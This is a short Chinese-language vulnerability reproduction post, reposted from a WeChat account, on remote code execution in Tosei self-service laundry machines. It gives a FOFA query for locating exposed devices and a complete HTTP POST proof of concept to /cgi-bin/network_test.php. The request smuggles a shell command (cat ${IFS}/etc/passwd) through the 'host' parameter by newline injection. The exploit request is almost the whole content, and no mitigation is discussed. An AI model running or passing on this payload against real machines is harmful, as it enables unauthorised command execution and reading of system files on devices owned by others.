漏洞描述
资产确定
fofa:
body="tosei_login_check.php"
漏洞复现
1.利用如下POC查看passwd
POST
/cgi-bin/network_test.php
HTTP/1.1
Host
: {{Hostname}}
Cache-Control
: max-age=0
Upgrade-Insecure-Requests
: 1
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding
: gzip, deflate
Accept-Language
: en-US,en;q=0.9
Connection
: close
Content-Type
: application/x-www-form-urlencoded
Content-Length
: 44
host
=
%0
acat
${IFS}
/etc/passwd
%0
a&command=ping
原文始发于微信公众号(我爱林):漏洞复现 || Tosei 自助洗衣机远程代码执行
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论